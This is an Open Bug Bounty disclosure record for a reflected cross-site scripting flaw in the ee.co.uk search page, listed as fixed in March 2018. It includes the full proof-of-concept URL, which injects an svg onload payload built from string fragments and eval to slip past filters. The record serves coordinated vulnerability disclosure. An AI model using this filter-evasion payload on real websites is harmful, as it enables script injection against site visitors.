ee.co.uk XSS vulnerability

2018-02-21T13:54:00
ID OBB:565061
Type openbugbounty
Reporter olihough86
Modified 2018-03-31T11:27:00

Description

Open Bug Bounty ID: OBB-565061

Description| Value
---|---
Affected Website:| ee.co.uk
Vulnerable Application:| Custom Code
Vulnerability Type:| XSS (Cross Site Scripting) / CWE-79
CVSSv3 Score:| 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N]
Disclosure Standard:| Coordinated Disclosure based on ISO 29147 guidelines
Remediation Guide:| OWASP XSS Prevention Cheat Sheet

Vulnerable URL:
http://ee.co.uk/search?q=%3Csvg%20onload%3D%22a%3D%27a%27%2B%27l%27%2B%27e%27%2B%27r%27%2B%27t%27%2B%27(%27%2B%27%26%2334%3B%26%2379%3B%26%2380%3B%26%2369%3B%26%2378%3B%26%2366%3B%26%2385%3B%26%2371%3B%26%2366%3B%26%2379%3B%26%2385%3B%26%2378%3B%26%2384%3B%26%2389%3B%26%2334%3B%27%2B%27)%27,eval(a)%22%3E

Coordinated Disclosure Timeline

Description| Value
---|---
Vulnerability Reported:| 21 February, 2018 13:54 GMT
Vulnerability Verified:| 21 February, 2018 14:01 GMT
Website Operator Notified:| 21 February, 2018 14:01 GMT
Vulnerability Published:| 21 February, 2018 14:01 GMT [without any technical details]
Vulnerability Fixed:| 31 March, 2018 11:27 GMT
Public Disclosure:| 31 March, 2018 11:27 GMT